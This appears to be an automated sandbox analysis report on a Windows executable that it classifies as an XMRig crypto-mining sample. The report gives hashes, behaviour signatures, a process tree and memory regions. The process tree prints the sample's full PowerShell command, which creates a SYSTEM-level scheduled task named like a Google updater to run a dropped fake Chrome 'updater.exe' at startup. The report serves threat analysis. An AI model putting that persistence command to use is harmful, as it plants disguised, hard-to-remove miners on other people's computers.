Analysis

  • max time kernel
    310s
  • max time network
    309s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/05/2023, 20:03

General

  • Target

    dododo.exe

  • Size

    5.6MB

  • MD5

    ef8886dc1cba9a06ce6e4d09d0f31484

  • SHA1

    6c489c2927284a5cbcd319b71ccd1e133fd7f210

  • SHA256

    fa2ea181c1f0faa6b1787c56fbb27d3fe8cc2ee0e08ba5635076b67ffe50204a

  • SHA512

    c23ce6554964af25821edd0b4aec8b9075615a96b85537d34ce936ae419efc54b61c2ab0f80c576b7fff446f47b1e7d6e3d7eb89dd76879c5164c02980acf747

  • SSDEEP

    98304:12NJTEYMxK/xNaNeY5BqZsvG65hvhUrBu7tu1oGqA64yxK:1NRw36bvH6OA6rK

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Blocklisted process makes network request 53 IoCs
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3112
      • C:\Users\Admin\AppData\Local\Temp\dododo.exe
        "C:\Users\Admin\AppData\Local\Temp\dododo.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:1780
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xrnhdk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1908
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
        2⤵
          PID:4920
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xrnhdk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:636
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe
          2⤵
            PID:4232
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe
            2⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            PID:3540
        • C:\Program Files\Google\Chrome\updater.exe
          "C:\Program Files\Google\Chrome\updater.exe"
          1⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Drops file in Program Files directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3304

        Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Program Files\Google\Chrome\updater.exe

                Filesize

                5.6MB

                MD5

                ef8886dc1cba9a06ce6e4d09d0f31484

                SHA1

                6c489c2927284a5cbcd319b71ccd1e133fd7f210

                SHA256

                fa2ea181c1f0faa6b1787c56fbb27d3fe8cc2ee0e08ba5635076b67ffe50204a

                SHA512

                c23ce6554964af25821edd0b4aec8b9075615a96b85537d34ce936ae419efc54b61c2ab0f80c576b7fff446f47b1e7d6e3d7eb89dd76879c5164c02980acf747

              • C:\Program Files\Google\Chrome\updater.exe

                Filesize

                5.6MB

                MD5

                ef8886dc1cba9a06ce6e4d09d0f31484

                SHA1

                6c489c2927284a5cbcd319b71ccd1e133fd7f210

                SHA256

                fa2ea181c1f0faa6b1787c56fbb27d3fe8cc2ee0e08ba5635076b67ffe50204a

                SHA512

                c23ce6554964af25821edd0b4aec8b9075615a96b85537d34ce936ae419efc54b61c2ab0f80c576b7fff446f47b1e7d6e3d7eb89dd76879c5164c02980acf747

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x3ezhxnu.3bj.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • memory/636-175-0x00007FF4D8CE0000-0x00007FF4D8CF0000-memory.dmp

                Filesize

                64KB

              • memory/636-161-0x00000180CA5D0000-0x00000180CA5E0000-memory.dmp

                Filesize

                64KB

              • memory/636-162-0x00000180CA5D0000-0x00000180CA5E0000-memory.dmp

                Filesize

                64KB

              • memory/636-163-0x00000180CA5D0000-0x00000180CA5E0000-memory.dmp

                Filesize

                64KB

              • memory/636-173-0x00000180E50A0000-0x00000180E50BC000-memory.dmp

                Filesize

                112KB

              • memory/636-174-0x00000180E5180000-0x00000180E518A000-memory.dmp

                Filesize

                40KB

              • memory/636-176-0x00000180E52F0000-0x00000180E530C000-memory.dmp

                Filesize

                112KB

              • memory/1780-149-0x00007FF61B360000-0x00007FF61B8FA000-memory.dmp

                Filesize

                5.6MB

              • memory/1908-145-0x000001B531D20000-0x000001B531D30000-memory.dmp

                Filesize

                64KB

              • memory/1908-144-0x000001B531D20000-0x000001B531D30000-memory.dmp

                Filesize

                64KB

              • memory/1908-133-0x000001B531D80000-0x000001B531DA2000-memory.dmp

                Filesize

                136KB

              • memory/1908-143-0x000001B531D20000-0x000001B531D30000-memory.dmp

                Filesize

                64KB

              • memory/3304-183-0x00007FF7E4730000-0x00007FF7E4CCA000-memory.dmp

                Filesize

                5.6MB

              • memory/3540-196-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-210-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-186-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-242-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-188-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-190-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-192-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-194-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-184-0x0000018FA1F50000-0x0000018FA1F70000-memory.dmp

                Filesize

                128KB

              • memory/3540-198-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-200-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-202-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-204-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-206-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-208-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-240-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-212-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-214-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-216-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-218-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-220-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-222-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-224-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-226-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-228-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-230-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-232-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-234-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-236-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/3540-238-0x00007FF6194A0000-0x00007FF619C8F000-memory.dmp

                Filesize

                7.9MB

              • memory/4232-185-0x00007FF6D8C00000-0x00007FF6D8C29000-memory.dmp

                Filesize

                164KB

              • memory/4232-187-0x00007FF6D8C00000-0x00007FF6D8C29000-memory.dmp

                Filesize

                164KB